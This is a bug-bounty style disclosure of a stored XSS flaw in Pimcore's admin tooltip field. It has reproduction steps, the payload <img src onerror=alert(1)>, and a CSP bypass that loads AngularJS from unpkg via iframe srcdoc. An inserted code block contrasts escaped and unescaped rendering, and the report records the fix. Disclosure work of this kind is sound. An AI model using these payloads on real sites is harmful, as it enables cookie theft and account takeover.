Stored XSS in Tooltip in pimcore/pimcore

Valid

Reported on

Mar 23rd 2022


Description

The Classes in Data Objects have a Tooltip field, which is vulnerable to a stored XSS attack.

Proof of Concept

STEP 1: Log in at https://demo.pimcore.fun/admin/.
STEP 2: Go to Settings -> Data Objects -> Classes, then choose an item, e.g. product Data -> AccessoryPart (AP) -> compatibleTo.
STEP 3: Add the payload <img src onerror=alert(1)> to the tooltip field, then save.
STEP 4: Open a Data Object of type AccessoryPart and move the cursor over the Compatible To field to trigger the event.

Every item that contains a tooltip field is vulnerable to this attack.
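The bug class described above is a stored value being concatenated into admin-UI markup as HTML instead of text. The following is an added illustration, not Pimcore's code and not the fix shipped in commit 8c39a8: the unsafe rendering pattern beside its hardened form, with the report's payload used as constructed input and a small stand-in check for a browser's parser.

```javascript
// Added example (not Pimcore's own code): a stored tooltip value reaching the
// admin UI unescaped versus escaped. The function names are hypothetical.

// Minimal HTML entity encoder for text placed into element content.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Unsafe rendering: the stored tooltip is concatenated straight into markup,
// so any tag it contains becomes part of the admin page's DOM.
function renderTooltipUnsafe(tooltip) {
  return `<div class="x-tip">${tooltip}</div>`;
}

// Hardened rendering: the tooltip is encoded on output and stays plain text,
// whatever was stored in the class definition.
function renderTooltipSafe(tooltip) {
  return `<div class="x-tip">${escapeHtml(tooltip)}</div>`;
}

// Stand-in for a browser here: does the rendered fragment contain any tag
// other than the wrapper div that the renderer itself emitted?
function introducesMarkup(html) {
  const tags = html.match(/<\/?[a-zA-Z][^>]*>/g) || [];
  return tags.some((tag) => !/^<\/?div\b/.test(tag));
}

// Constructed sample input: the payload quoted in the report.
const STORED_TOOLTIP = '<img src onerror=alert(1)>';

// Usage: only the unsafe renderer lets the stored value add an element.
console.log(introducesMarkup(renderTooltipUnsafe(STORED_TOOLTIP))); // true
console.log(introducesMarkup(renderTooltipSafe(STORED_TOOLTIP)));   // false
```

Encoding at the render site is the durable fix; filtering on save would leave existing stored values and other render paths (the "every item with a tooltip field" case above) unprotected.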

Impact

This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.

We are processing your report and will contact the pimcore team within 24 hours. a year ago
We have contacted a member of the pimcore team and are waiting to hear back a year ago
We have sent a follow up to the pimcore team. We will try again in 7 days. a year ago
pimcore/pimcore maintainer has acknowledged this report a year ago
Divesh Pahuja
a year ago

Maintainer


@mylong Hi, Pimcore comes with a generic XSS protection handler, which is implemented on https://10.x-dev.pimcore.fun/admin. Please try to reproduce the problem on the master demo instance.

mylong
a year ago

Researcher


Seems the CSP works, since unpkg is in the whitelist. I can temporarily use the following way to bypass the CSP.
STEP1: [screenshot]
STEP2: [screenshot]
POC: <Iframe SrcDoc="<Script Src=https://unpkg.com/angular@1.6.0/angular.min.js></Script><K Ng-App>{{$new.constructor('alert(1)')()}}">

Divesh Pahuja validated this vulnerability a year ago
mylong has been awarded the disclosure bounty
The fix bounty is now up for grabs
Divesh Pahuja marked this as fixed in 10.4 with commit 8c39a8 a year ago
Divesh Pahuja has been awarded the fix bounty
This vulnerability will not receive a CVE